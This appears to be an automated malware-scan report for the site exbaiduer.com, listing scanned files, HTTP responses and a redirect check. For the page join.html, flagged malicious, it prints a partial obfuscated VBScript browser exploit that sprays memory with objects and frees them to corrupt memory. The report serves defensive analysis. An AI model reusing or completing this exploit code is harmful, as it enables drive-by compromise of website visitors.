Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exbaiduer.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://exbaiduer.com/ | 200 OK Content-Length: 1927 Content-Type: text/html | clean |
http://exbaiduer.com/js/jquery-1.11.0.min.js | 200 OK Content-Length: 96381 Content-Type: text/javascript | clean |
http://exbaiduer.com/js/blh.js | 200 OK Content-Length: 1228 Content-Type: text/javascript | clean |
http://s22.cnzz.com/z_stat.php?id=1000265978&web_id=1000265978 | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://exbaiduer.com/join.html | 200 OK Content-Length: 95806 Content-Type: text/html | malicious |
Malicious code (confirmed by antiviruses, see below):
On Error Resume Next
Dim jjvmscqvm,eoyehpnucwq,hcanmotm
eoyehpnucwq = -7
hcanmotm = 0
jjvmscqvm = 5493
Dim wowpfncfxjpy(5493)
Set rlfrssnkd = ohkmrqpss.requiredClaims
For snpdtrgfvmy = hcanmotm to jjvmscqvm
  Set wowpfncfxjpy(snpdtrgfvmy) = document.createElement("object")
Next
For snpdtrgfvmy = 4093 to jjvmscqvm Step 2
  wowpfncfxjpy(snpdtrgfvmy) = Null
Next
For cxdgertanzbp = hcanmotm to eoyehpnucwq Step -1
  rlfrssnkd.remove(CLng(cxdgertanzbp))
Next
Dim nafrfznljlz,ggggggggg
ggggggggg=ddddd()
nafrfznljlz = dlrciyrnpnl()
rlfrssnkd.add(nafrfznljlz)
rlfrssnkd.add("AAAAAAAAAAAAAAAAAAAAAA")
rlfrssnkd.add(ggggggggg)
For zapkxleagfv = hcanmotm to jjvmscqvm
  if wowpfncfxjpy(zapkxleagfv) <> Null Then wowpfncfxjpy(zapkxleagfv).focus End If
Next
For bxrppjvjy = hcanmotm to jjvmscqvm
  wowpfncfxjpy(bxrppjvjy) = Null
Next
Antivirus reports:
http://exbaiduer.com/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: exbaiduer.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 20:44:02 GMT
Accept-Ranges: bytes
ETag: "ad43b5-787-4f38f60a2d680"
Server: Apache/2.2.15 (CentOS)
Content-Length: 1927
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 01 Mar 2014 18:03:54 GMT
...1927 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: exbaiduer.com
Referer: http://www.google.com/search?q=exbaiduer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.